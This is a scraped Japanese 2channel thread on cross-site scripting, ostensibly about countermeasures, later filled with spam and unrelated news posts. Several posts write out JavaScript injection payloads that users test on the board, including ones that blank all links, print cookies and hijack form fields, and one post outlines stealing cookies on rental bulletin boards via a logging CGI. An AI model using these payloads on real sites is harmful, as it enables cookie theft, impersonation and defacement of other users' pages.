クロスサイトスクリプティング対策 (114レス)
上下前次1-新
1: 名無しさん@お腹いっぱい。 01/10/27 10:37 ID:AENF9z2S(1/2) AAS
外部リンク[pdf]:securit.etl.go.jp
簡単にいって、フォームの入力をサーバサイドで処理してHTMLと
して出力する時に、文字のエスケープを適切に行わないと、
Cookieを取得するJavaScriptを埋め込み&出力結果を別サイトに
リダイレクトする、というような方法を使ってCookieを第三者に
盗まれる可能性がある、ということです。
上の資料を参考にしながら、
省2
34: テスト 01/12/19 07:01 ID:RLJpoDQa(1) AAS
外部リンク:pc.2ch.net
35: テスト 01/12/19 07:06 ID:??? AAS
外部リンク:pc.2ch.net
36: 名無しさん@お腹いっぱい。 [age] 02/01/12 14:08 ID:??? AAS
age
37: 02/01/26 08:50 ID:SUrQysHb(1) AAS
a
38(1): 名無しさん@お腹いっぱい。 02/01/26 11:51 ID:??? AAS
こんなのmail欄に入れたらどうなるんだろう?
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
39: 名無しさん@お腹いっぱい。 02/01/26 13:20 ID:??? AAS
>38
自分でやってみてよ(笑)
40(2): 名無しさん@お腹いっぱい。 02/01/26 13:47 ID:??? AAS
メール欄が長すぎます・・・だって(笑)
&{for(var i=0;document.links[i];i++)document.links[i].href='';};
これは大丈夫やった。
41(1): 名無しさん@お腹いっぱい。 02/01/26 14:05 ID:??? AAS
>40
どこでやってきたの?(笑)
42(1): 名無しさん@お腹いっぱい。 02/01/26 17:32 ID:??? AAS
>>41
色んなところ。反応が一つもないところを見ると
NN4でスクリプトONにしてる奴、あんまおらんのかな?
43: 名無しさん@お腹いっぱい。 [&{document.write(document.cookie)};] 02/01/26 22:09 ID:??? AAS
age
44: 名無しさん@お腹いっぱい。 [<script>document.write(l(null));</script>] 02/01/26 22:19 ID:??? AAS
age
45(1): ネスケ4.7使用者 02/01/27 10:13 ID:??? AAS
>>42
ひいい・・・・2ちゃんで窓が出たよう・・・。
46: 名無しさん@お腹いっぱい。 02/01/27 10:17 ID:??? AAS
>45
(笑)
47: 仕様書無しさん 02/01/27 23:08 ID:??? AAS
>>40
分割すればいいみたい。>>12>>13
48: 名無しさん@お腹いっぱい。 [&{for(var i=0;document.links[i];i++)document.links[i].href='';};] 02/02/06 03:45 ID:??? AAS
テスト
49: 名無しさん@お腹いっぱい。 02/02/06 03:46 ID:dMmdiZ7p(1) AAS
大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4)
外部リンク[html]:www.netsecurity.ne.jp
50: テスト [&{f=document.forms;}] 02/02/08 00:23 ID:??? AAS
51: テスト [&{for(i=0;f[i];i++)f[i].elments[4].value='fusianasan';}] 02/02/08 00:28 ID:??? AAS
52(1): 名無しさん@お腹いっぱい。 02/02/08 13:44 ID:??? AAS
>日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
>が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
>になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。
タグ可の掲示板はみんな着尺製ありだな
2chスレ:sec
53: 名無しさん@お腹いっぱい。 02/02/09 01:21 ID:??? AAS
F=Function;fs=document.forms;
l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
省7
54(1): 名無しさん@お腹いっぱい。 02/02/12 11:32 ID:??? AAS
>>52
>着尺製
読めない…。
55(1): 名無しさん@お腹いっぱい。 02/02/12 11:44 ID:??? AAS
>>54
> >着尺製
「脆弱性」の (2ch的?) 誤読だと思われ。
正しくは「もろよわせい」と読むらしい。
56: 名無しさん@お腹いっぱい。 02/02/12 12:06 ID:??? AAS
>>55
2chスレ:sec
2chスレ:sec
57: 名無しさん@お腹いっぱい。 [age] 02/02/12 22:55 ID:??? AAS
>>22
で、22はお腹いっぱいヤバゲなの見つかったのかな?
SSLなページの確認はメンドーでないかい? >all
アホプログラマーの重箱の隅つつくのも疲れてきたぞ。(藁
58: 名無しさん@お腹いっぱい。 [もろよわ] 02/02/19 00:17 ID:??? AAS
> SSLなページの確認はメンドーでないかい?
なぜに?
59: 57 [age] 02/02/19 01:53 ID:??? AAS
漏れがバカだから。とりあえずパケットキャプチャーしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのクライアントで見て、値が固定されてるもののテストってどうしてますか?
例えば買い物の個数とかサーバ側でエスケープ処理してるか確認したい訳で。
POSTメソッドの値を色々試すのに良いツールってないですかねぇ。HTMLエディタで書き換える?
60(1): 名無しさん@お腹いっぱい。 02/02/19 02:02 ID:??? AAS
外部リンク:www.mountsystem.ne.jp
ここのTantanCGI
61: 57 [age] 02/02/19 07:49 ID:??? AAS
>>60
すっ、すばらしい...。ありがとう御座います。感謝感激!
これでもっと重箱の隅つっけそうです。(藁
62: a 02/06/27 00:50 ID:awVCb82d(1) AAS
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
63: 02/12/06 16:58 ID:??? AAS
ここで配布してるスクリプトも脆弱性の問題あり?
外部リンク[zip]:www.onpuch.jp
64: 03/01/10 01:43 ID:QhQLqNIU(1) AAS
Struts使おう。
65: 山崎渉 [(^^)sage] 03/01/16 03:36 ID:??? AAS
(^^)
66: 奥さん ◆mL2ZRk1cK. 03/01/18 07:27 ID:AxdRMTC9(1/9) AAS
d
67: 奥さん ◆0Z6Yhsb88E 03/01/18 07:27 ID:AxdRMTC9(2/9) AAS
aq
68: 奥さん ◆E39m/9K3xY 03/01/18 07:28 ID:AxdRMTC9(3/9) AAS
qwe
69: 奥さん ◆8WgvSovIKg 03/01/18 07:28 ID:AxdRMTC9(4/9) AAS
qwer
70: 奥さん ◆ABM5odHy/Q 03/01/18 07:29 ID:AxdRMTC9(5/9) AAS
12345
71: 奥さん ◆bc.v5kgifQ 03/01/18 07:30 ID:AxdRMTC9(6/9) AAS
hfjfjf
72: 奥さん ◆IGEMrmvKLI 03/01/18 07:31 ID:AxdRMTC9(7/9) AAS
vbncnnb
73: 奥さん ◆tsGpSwX8mo 03/01/18 07:31 ID:AxdRMTC9(8/9) AAS
hhhhhhhh
74: 奥さん ◆Mjk4PcAe16 03/01/18 07:32 ID:AxdRMTC9(9/9) AAS
fhfhfhfhfh
75: [ ] 03/01/19 15:22 ID:??? AAS
荒らされてる
76: [hoge] 03/01/19 15:58 ID:??? AAS
XSS対策のひとつとして、「エスケープ処理」がある。
これはCGIが扱うパラメータが多くなってくると、ついつい忘れてしまう煩雑で面倒な処理だが、
もしあなたがPerlユーザなら、HTML::Templateを使うことによってエスケープを
テンプレート側に記述し、プログラム側から完全に追い出してしまうことができる。
<input type="hidden" value="<tmpl var="aniti_xss_value" escape="url">">
<input type="text" value="<tmpl var="aniti_xss_text" escape="html">">
最後のescape属性に注目だ。これを指定してやるだけで、
省3
77: 03/01/19 16:01 ID:??? AAS
ヽ(゚∀゚)ノヒャホー
78: 03/01/21 19:45 ID:eVlnRoM0(1) AAS
対策ではなくクキー盗む方法なのだが。
JBBSなどレンタル系の掲示板で使える。(htmlにログを表示して、javascriptでクッキーを読み出すもの)
レンタル系の掲示板は、自分が書き込んだ掲示板以外の板にもクッキーが適応されるところが多い。
(たとえば、外部リンク:jbbs.shitaraba.comに書き込むと外部リンク:jbbs.shitaraba.comの板にも適応される。)
これを利用して、自分の掲示板に書き込まれなくてもクッキーに入っているデータを取得できる。
具体的方法として
1.GET(QUERY_STRING)からのデータをテキストに保存するCGIを作成し、適当なフリーサーバに設置
省3
79: 03/01/21 23:40 ID:ByrQNqOs(1) AAS
クッキーのpathを / とかにしてるんだろうね。
名前が漏れるくらいはなんでもないけど
トリップやキャップもクッキーに入ってるとなりすましが出来ると。
80(1): 03/01/26 15:26 ID:??? AAS
XSS 脆弱性で Basic 認証のパスワードも盗まれるらしいぞ
外部リンク[html]:memo.st.ryukoku.ac.jp
(((;゚Д゚))ガクガクブルブル
81: 03/01/28 20:54 ID:wWZkstRp(1) AAS
>>80
ウゲ
でも
> サーバのTRACEメソッドが機能している場合
ってどういう場合なの?
82: 山崎渉 [(^^)] 03/04/17 12:26 ID:??? AAS
(^^)
83(1): 山崎渉 [(^^)sage] 03/04/20 06:06 ID:??? AAS
∧_∧
( ^^ )< ぬるぽ(^^)
84: 03/05/11 20:11 ID:??? AAS
TRACE / HTTP/1.1
Host: localhost
Authorization: Basic
HTTP/1.1 200 OK
Date: Sun, 11 May 2003 11:07:46 GMT
Server: Apache/1.3.27
Transfer-Encoding: chunked
省7
85: 山崎渉 [(^^)] 03/05/22 02:10 ID:??? AAS
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
86: 山崎渉 [(^^)] 03/05/28 17:16 ID:??? AAS
AA省
87: 山崎 渉 [(^^)] 03/07/15 11:18 ID:??? AAS
AA省
88(1): 山崎 渉 [(^^)sage] 03/08/02 02:34 ID:??? AAS
∧_∧
( ^^ )< ぬるぽ(^^)
89: ぼるじょあ ◆ySd1dMH5Gk [(^^)] 03/08/02 05:12 ID:??? AAS
AA省
90: 山崎 渉 [(^^)] 03/08/15 23:09 ID:??? AAS
AA省
91: 03/08/28 13:53 ID:5epBRgUL(1) AAS
2chにはもうXSS使える穴は無い?
92: 03/08/29 01:04 ID:??? AAS
半角で穴見つかったのが最後かな?
93: 03/08/29 14:52 ID:??? AAS
そうか…
XSS使えばフレームでの別ドメインの制限が回避出来るんだけどなー…
94: 03/12/27 14:03 ID:6Fk7/T/f(1) AAS
XSSをさらすスレはここですか?
95: 2005/11/20(日)11:58 ID:??? AAS
外部リンク:www.creators-fukuoka.com
クロスサイトスクリプティング出来る?
96: 2006/08/07(月)13:26 ID:??? AAS
保守
97: 2006/09/28(木)06:10 ID:??? AAS
2chスレ:hp
98: 2008/05/08(木)19:41 ID:CmE1kuyM(1) AAS
age
99: 2008/08/22(金)19:39 ID:??? AAS
外部リンク:youtube2.in
<
>
"
あたりエスケープできてなくね。
100: [age] 2008/08/22(金)19:40 ID:??? AAS
age
101: 忍法帖【Lv=6,xxxP】 2011/05/19(木)08:58 ID:??? AAS
tes
102: 2011/05/22(日)16:35 ID:riL4CCVW(1) AAS
AA省
103: 2012/10/19(金)02:23 ID:??? AAS
あげ
104: 2012/10/19(金)02:24 ID:F/2XWufo(1) AAS
あげそこなった
105: 【21.9m】 電脳プリオン 2014/09/28(日)22:47 ID:??? AAS
AA省
106: 2015/11/04(水)19:17 ID:gcyCvqHq(1) AAS
転職時の注意事項。
下記の条件が全て当てはまる会社にご注意下さい。
・IT系 in Tokyo
・転職会議で2.5点
・転職会議の「その他>2ch情報」の欄で過去の労基2chスレが表示される
107: 2017/01/21(土)19:02 ID:iuL6ICc7(1) AAS
ぬるぽ
108: 2017/12/30(土)15:46 ID:YhlYw6jg(1) AAS
誰でも簡単にネットで稼げる方法など
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。
グーグル検索⇒『半藤のブブイウイウレレ』
4DKB1XYW1O
109: 2019/02/10(日)00:29 ID:irY2hutm(1) AAS
私はユーザーとして、2ちゃんねるでこのクロスサイトスクリプティングをされた可能性があるのですが、
もしされてしまった後はどうしたら良いでしょうか?
教えてください。
大変困っています。
110: プーチン発の危機 2022/02/26(土)12:09 ID:WEIXupXE(1) AAS
ウクライナ危機、米国は日本の“弱腰対応”を許さない構え 遠のく「北方領土返還」
111: ロシア、外貨の両替停止 欧米制裁で深刻な不足か 2022/03/10(木)02:41 ID:ZzSzzF4L(1) AAS
ロシア中央銀行は9日、市中の銀行が国民に外貨を売ることを停止すると発表した。
これを受け、外貨両替ができなくなる。ウクライナ侵攻に伴う欧米の制裁で中銀が保有する外貨準備が凍結されたため、深刻な外貨不足に見舞われているもようだ。
112: 2023/09/28(木)21:32 ID:??? AAS
大丈夫だ、問題ない
113: 03/27(木)16:13 ID:dZ2BayE6(1) AAS
大型商業施設ATCシーサイドテラス内にあるストリートピアノ(大阪市住之江区)の使用方法について注意喚起し、ネット上で物議となっていた南港ストリートピアノの公式Xは27日、「一昨日、ピアノの撤去が完了しましたことを、ご報告させていただきます」と報告した。
114: 公用車が高級車ブランド「レクサス」 05/29(木)10:46 ID:PSo9zbE8(1) AAS
俳優・岸谷五朗(60)、ミュージシャン・岸谷香(58)夫妻の長男で、実業家・インフルエンサーとして活動する岸谷蘭丸(23)が28日に自身のX(旧ツイッター)を更新。小泉進次郎新農相に一部で批判が寄せられている件について言及した。
小泉氏は視察のため、街の米販売店を訪れた。しかし、その際に乗っていた公用車が高級車ブランド「レクサス」だったため、ネット上の一部で「なめるな」といった批判の声が上がっていた。
この件について、蘭丸は「今の流れでこれは叩かれるだろうが、政治家はこれでいい」と擁護。
「要人が高級日本車をプロモーションする事でメーカーは生産を続けられるし海外にも売り出せる。一種のロールモデルとして高級国産品はどんどん使っていただきたい」と自身の見解をつづっていた。
上下前次1-新書関写板覧索設栞歴
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.446s*